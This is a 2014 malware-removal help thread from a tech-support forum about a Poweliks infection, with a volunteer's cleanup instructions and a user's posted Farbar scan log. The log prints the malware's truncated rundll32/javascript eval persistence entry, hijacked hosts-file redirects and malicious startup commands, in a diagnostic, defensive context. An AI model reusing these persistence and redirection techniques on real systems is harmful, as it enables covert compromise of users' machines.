Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with Powerliks malware.


  • This topic is locked This topic is locked
38 replies to this topic

#1 Bobbie S.

Bobbie S.

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 30 October 2014 - 08:38 PM

I have gone thru  various processes to get rid of COM Surrogate issues.

 

The thread appears here:  http://www.bleepingcomputer.com/forums/t/553280/possible-infection-com-surrogate/

 

 MBAR says the computer is infected with Powerliks malware.

I have run DDS.com and here is the results of the Attach.txt.   The  DDS.txt file did not appear though.

 

.

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Professional 
Boot Device: \Device\HarddiskVolume1
Install Date: 11/25/2013 11:49:52 AM
System Uptime: 10/30/2014 9:02:14 PM (0 hours ago)
.
Motherboard: Dell Inc.           |  | 0HP962
Processor: Intel® Core™2 CPU          6300  @ 1.86GHz | Microprocessor | 1862/1066mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 698 GiB total, 655.755 GiB free.
D: is CDROM (CDFS)
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft Teredo Tunneling Adapter
Device ID: ROOT\*TEREDO\0000
Manufacturer: Microsoft
Name: Teredo Tunneling Pseudo-Interface
PNP Device ID: ROOT\*TEREDO\0000
Service: tunnel
.
==== Image File Execution Options =============
.
.
==== Installed Programs ======================
.
.
==== End Of File ===========================
 
Additional info:
Just now, MS Security Essentials found and cleaned the following:
Dates seem to go back a few days though.
 
Behavior:Win32/Zemot.gen!A
PWS:Win32/Zbot.gen!plock  (two instances)
PWS:Win32/Zbot  (MANY instances)
TrojanDownloader:Win32/Notodar
Ransom:Win32/Crowti.A  (two instances
Virus:DOS/Rovnix.W
Virus:Win32/Rovnix.gen!c
Exploit:JS/CVE-2013-2551.C  (these are found every few minutes)
 

 



BC AdBot (Login to Remove)

 


#2 Bobbie S.

Bobbie S.
  • Topic Starter

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 04 November 2014 - 07:57 AM

Is this computer hopeless?  I followed instructions up to the point where I was said to continue the post with a new topic in this location.

I did that, but have received no responses.

If reformatting is suggested, please advise.

Bobbie2836



#3 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:05:52 PM

Posted 04 November 2014 - 05:13 PM

Hi & :welcome: to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems.

Before we move on, please read the following points carefully: :exclame:
  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are follow my instructions, Stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1
logo.png
Please download Powelikscleaner (by ESET) and save it to your Desktop.
  • Double-click the 3.png to start the tool.
  • Read the terms of the End-user license agreement and click Agree if you agree to them.
  • The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
  • If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
  • The tool will produce a log in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
1.png
2.png

Step 2

Please run a FRST scan. This will help us diagnose your problem.

frst.pngfrstscan.png
Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#4 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:05:52 PM

Posted 07 November 2014 - 03:18 PM

Hi,

3 Day Inactivity

This is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#5 Bobbie S.

Bobbie S.
  • Topic Starter

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 07 November 2014 - 08:42 PM

I'll be on that infected computer tomorrow, and will send the FRST & Addition texts then.

Thank you so much.

Bobbie



#6 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:05:52 PM

Posted 08 November 2014 - 06:27 AM

OK... :)

Thanks for letting me know.
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#7 Bobbie S.

Bobbie S.
  • Topic Starter

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 08 November 2014 - 12:48 PM

Here are the Addition.txt and Frst.txt contents.

Also, IE security settings won't hold on "default level"

Bobbie

*****************

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 08-11-2014 01
Ran by Jack at 2014-11-08 12:44:49
Running from C:\Users\Jack\Downloads
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.07) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.07 - Adobe Systems Incorporated)
Auslogics DiskDefrag (HKLM\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.5.4.0 - Auslogics Labs Pty Ltd)
CCleaner (HKLM\...\CCleaner) (Version: 4.19 - Piriform)
CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version:  3.0 - CutePDF.com)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
Glary Utilities 5.10 (HKLM\...\Glary Utilities 5) (Version: 5.10.0.17 - Glarysoft Ltd)
Google Chrome (HKLM\...\{51020C27-7422-3FBE-9480-4CB1CCC8E2CC}) (Version: 65.156.32827 - Google, Inc.)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
HP Deskjet 1510 series Basic Device Software (HKLM\...\{C821234A-3642-493B-95AF-46F776392E20}) (Version: 32.0.1180.44630 - Hewlett-Packard Co.)
HP Deskjet 1510 series Help (HKLM\...\{2E25FCEB-EFCB-4696-AA01-D3CBAC721831}) (Version: 30.0.0 - Hewlett Packard)
HP FWUpdateEDO2 (HKLM\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP Photo Creations (HKLM\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Support Solutions Framework (HKLM\...\{86FD8326-909D-45F5-BB61-0619D0D31293}) (Version: 11.50.0011 - Hewlett-Packard Company)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (Version: 1.00.0001 - Microsoft) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1930 - Intel Corporation)
Java 7 Update 60 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217060FF}) (Version: 7.0.600 - Oracle)
LibreOffice 4.1.3.2 (HKLM\...\{4F3722AD-197D-4DBB-BDFB-D2F0D6776354}) (Version: 4.1.3.2 - The Document Foundation)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Product Improvement Study for HP Deskjet 1510 series (HKLM\...\{40147F4F-B73E-4C87-A3D3-8BD36F7C77F0}) (Version: 32.0.1180.44630 - Hewlett-Packard Co.)
SoundMAX (HKLM\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.1.7265 - Analog Devices)
TeamViewer 9 (HKLM\...\TeamViewer 9) (Version: 9.0.32494 - TeamViewer)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{49BBAA3C-C574-419E-8378-783C362E9C15}\InprocServer32 -> C:\Program Files\HP\Common\FWUpdateEDO2.dll (Hewlett-Packard Co.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)

==================== Restore Points  =========================

02-11-2014 16:52:30 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:04 - 2014-11-05 16:38 - 00001497 _RASH C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
146.0.75.27 www.google-analytics.com.
146.0.75.27 google-analytics.com.
146.0.75.27 connect.facebook.net.
107.181.187.40 www.google-analytics.com.
107.181.187.40 google-analytics.com.
107.181.187.40 connect.facebook.net.
85.17.81.55 www.google-analytics.com.
85.17.81.55 google-analytics.com.
85.17.81.55 connect.facebook.net.

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1AD2C709-B5BE-4B77-9BEA-6B42066C6A94} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => d:\program files\windows defender\MpCmdRun.exe
Task: {1E3691DB-94B1-4C25-AD77-3875AAA91D45} - \TidyNetwork Update No Task File <==== ATTENTION
Task: {2A10788F-315A-4881-9817-A822B4C1CAAB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-11-25] (Google Inc.)
Task: {2D6DFA23-1DF1-4478-A25D-CB3DE9434A6F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-10-23] (Piriform Ltd)
Task: {3ED50F48-3894-4651-9343-2DF04AA0CB8E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-11-25] (Google Inc.)
Task: {3FB7FEEF-04CB-4457-BE54-9BD34286F8A0} - System32\Tasks\{CFE9EF51-B708-8BEB-C2A3-4F5658BA669F} => C:\Windows\system32\rqzan.dll/s "C:\Windows\system32\rqzan.dll"
Task: {412C8FCE-7375-4451-8270-DBBDFD519E91} - \Security Center Update - 1236605613 No Task File <==== ATTENTION
Task: {4227ED40-F378-45B8-829F-FC479D3AFBEE} - \TheBestDeals Update No Task File <==== ATTENTION
Task: {42CC36AA-BAFC-4898-8AA8-78188575BF56} - System32\Tasks\HPCustParticipation HP Deskjet 1510 series => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPCustPartic.exe [2013-08-13] (Hewlett-Packard Co.)
Task: {98C53881-CBEF-4557-A773-4342C60DDED2} - System32\Tasks\HP AR Program Upload - 1665a69506154377aebded6d3321133697bfb85f401e4da8b79d5bea55e71083 => C:\Program Files\HP\HP Deskjet 1510 series\bin\HPRewards.exe [2013-08-13] (TODO: <Company name>)
Task: {A93480F7-E588-4B0C-9169-0A32F8C015AE} - \Security Center Update - 2482164111 No Task File <==== ATTENTION
Task: {F3CFC8A3-717F-4429-832B-7D408BE0A753} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2014-02-20 20:01 - 2013-10-23 15:23 - 00089136 _____ () C:\Windows\System32\cpwmon2k.dll
2014-11-07 21:02 - 2014-11-07 21:02 - 00325166 ___SH () C:\Windows\Installer\{F9005E4A-3F66-4B93-9604-53209B03D6F7}\msiexec.exe
2014-11-07 21:02 - 2014-11-07 21:02 - 00023552 _____ () C:\Users\Jack\AppData\Local\acikmao.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\Users\Jack\Documents\Fw_ Criminal Complaint Filed vs_ Obama due to Latest _Birth Certificate_ Being a Forgery.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\Fw_ Does ultimatum mean Iran will invade Saudi Arabia_.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\Fw_ Does Ultrimatum mean Iran will invade.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\Fw_ Great News_  DeMint Mulls 2012 Bid.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\The Answer to Your Prayers is Here for those who believe.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\Veteran's Counseling Program.eml:OECustomProperty

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^Users^Jack^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Jack^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Ink Alerts - HP Deskjet 1510 series.lnk => C:\Windows\pss\Monitor Ink Alerts - HP Deskjet 1510 series.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: BManager => C:\Program Files\Browser Features\BManager.exe
MSCONFIG\startupreg: Browser Features => C:\Program Files\Browser Features\BManager.exe
MSCONFIG\startupreg: HotKeysCmds => C:\Windows\system32\hkcmd.exe
MSCONFIG\startupreg: HP Software Update => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: MSMPENG => C:\Users\Jack\AppData\Roaming\svc-umwl.exe
MSCONFIG\startupreg: Skgrfuuzzc => regsvr32.exe /s "C:\Users\Jack\AppData\Local\Programs\Skgrfuuzzc.dll"
MSCONFIG\startupreg: SoundMAXPnP => C:\Program Files\Analog Devices\Core\smax4pnp.exe
MSCONFIG\startupreg: SpUninstallCleanUp => REG delete HKEY_LOCAL_MACHINE\Software\SearchProtect /f
MSCONFIG\startupreg: Windows X64 Service Manager => C:\Program Files\FlashNow Updater\flsysio.exe

========================= Accounts: ==========================

Administrator (S-1-5-21-2108881583-117912961-3019965817-500 - Administrator - Disabled)
Guest (S-1-5-21-2108881583-117912961-3019965817-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2108881583-117912961-3019965817-1002 - Limited - Enabled)
Jack (S-1-5-21-2108881583-117912961-3019965817-1000 - Administrator - Enabled) => C:\Users\Jack

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (11/08/2014 11:27:28 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x541b6f63
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x06cd0892
Faulting process id: 0xdcc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/07/2014 09:03:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: wjetifgd.exe, version: 3.0.0.2, time stamp: 0x544a8070
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00005b30
Faulting process id: 0x24c8
Faulting application start time: 0xwjetifgd.exe0
Faulting application path: wjetifgd.exe1
Faulting module path: wjetifgd.exe2
Report Id: wjetifgd.exe3

Error: (11/07/2014 09:03:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UpdateFlashPlayer_e32eb32e.exe, version: 1.0.0.1002, time stamp: 0x539d7a76
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00004542
Faulting process id: 0xa38
Faulting application start time: 0xUpdateFlashPlayer_e32eb32e.exe0
Faulting application path: UpdateFlashPlayer_e32eb32e.exe1
Faulting module path: UpdateFlashPlayer_e32eb32e.exe2
Report Id: UpdateFlashPlayer_e32eb32e.exe3

Error: (11/07/2014 09:03:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UpdateFlashPlayer_7accf934.exe, version: 1.0.0.1002, time stamp: 0x539d7a76
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00004542
Faulting process id: 0x37dc
Faulting application start time: 0xUpdateFlashPlayer_7accf934.exe0
Faulting application path: UpdateFlashPlayer_7accf934.exe1
Faulting module path: UpdateFlashPlayer_7accf934.exe2
Report Id: UpdateFlashPlayer_7accf934.exe3

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: msiexec.exe, version: 3.8.0.2, time stamp: 0x545c8b63
Faulting module name: msiexec.exe, version: 3.8.0.2, time stamp: 0x545c8b63
Exception code: 0xc0000005
Fault offset: 0x000012df
Faulting process id: 0x21c0
Faulting application start time: 0xmsiexec.exe0
Faulting application path: msiexec.exe1
Faulting module path: msiexec.exe2
Report Id: msiexec.exe3

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: msiexec.exe, version: 1.0.0.1002, time stamp: 0x545d1e98
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00020919
Faulting process id: 0x1894
Faulting application start time: 0xmsiexec.exe0
Faulting application path: msiexec.exe1
Faulting module path: msiexec.exe2
Report Id: msiexec.exe3

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: msiexec.exe, version: 3.8.0.2, time stamp: 0x545c8b63
Faulting module name: msiexec.exe, version: 3.8.0.2, time stamp: 0x545c8b63
Exception code: 0xc0000005
Fault offset: 0x000012df
Faulting process id: 0x2614
Faulting application start time: 0xmsiexec.exe0
Faulting application path: msiexec.exe1
Faulting module path: msiexec.exe2
Report Id: msiexec.exe3

Error: (11/07/2014 04:45:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/07/2014 01:21:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x541b6f63
Faulting module name: igdumd32.dll, version: 8.14.10.1930, time stamp: 0x4aba746b
Exception code: 0xc0000005
Fault offset: 0x00004ff8
Faulting process id: 0x1c88
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/06/2014 07:09:24 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

System errors:
=============
Error: (11/08/2014 00:44:24 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/08/2014 11:00:45 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/08/2014 11:00:25 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/08/2014 10:59:56 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/08/2014 08:53:39 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/08/2014 04:56:34 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/08/2014 04:53:40 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/08/2014 01:33:41 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/08/2014 00:53:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/07/2014 08:53:37 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Microsoft Office Sessions:
=========================
Error: (11/08/2014 11:27:28 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17344541b6f63unknown0.0.0.000000000c000000506cd0892dcc01cffafd7aa0cdc3C:\Program Files\Internet Explorer\iexplore.exeunknown20f437f6-6764-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: wjetifgd.exe3.0.0.2544a8070unknown0.0.0.000000000c000000500005b3024c801cffaf83b36f9d4C:\Users\Jack\AppData\Local\Temp\wjetifgd.exeunknown7a140282-66eb-11e4-9459-001e4f99a790

